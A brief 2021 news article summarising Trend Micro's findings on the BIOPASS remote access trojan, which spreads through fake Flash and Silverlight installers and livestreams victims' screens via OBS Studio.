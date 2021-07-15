Any infected computer’s screen is livestreamed by this malware. Don’t Let Yourself Become a Victim!

A new malware is being discussed that exploits a popular live-streaming software to record and broadcast the screen of unwary victims.

Trend Micro researchers have found a new and unique malware known as a remote access Trojan (RAT). BIOPASS is a virus that hides inside Microsoft Silverlight and Adobe Flash Player installations. According to the research, these malicious Silverlight and Flash installers load a sophisticated RAT that is implemented as Python scripts.

BIOPASS, according to cybersecurity experts, is not a standard RAT. BIOPASS RAT is particularly intriguing because it can sniff its victim’s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP), according to Trend Micro cybersecurity researchers.

This new malware possesses all of the characteristics of remote access trojans. It can also perform file system analysis, remote desktop access, file extraction, screenshot capture, and shell command execution. It also downloads FFmpeg, a program that allows you to record, transcode, and broadcast video and audio. It also downloads the Open Broadcaster Software, which is required for live streaming and video recording.

Malicious actors can track the infected system’s desktop using one of the two frameworks. They can also upload videos to the cloud, allowing them to monitor the feed in real time through the BIOPASS management panel. Researchers observed that the script that retrieves BIOPASS checks to see if the visitor is infected. If not, it is injected into the online help chat page of the target site.

“If the script validates that the visitor has not yet been infected, it will then replace the original website content with the attackers’ own material,” according to Trend Micro. The new page will display an error message along with an instruction to download either a Flash installer or a Silverlight installer, both of which are malicious loaders.”

Adobe stopped supporting Flash Player in 2020 and has been blocking Flash content since January 2021. Because of the severe security dangers, the business also advises users to delete the software from their devices. Microsoft followed suit, announcing that SilverLight support would be phased down in October of this year.

Trend Micro confirmed that the group behind the BIOPASS RAT has yet to be identified. Its cybersecurity researchers, on the other hand, identified many pieces of evidence that linked the malware to accused Chinese state-sponsored criminals. Brief News from Washington Newsday.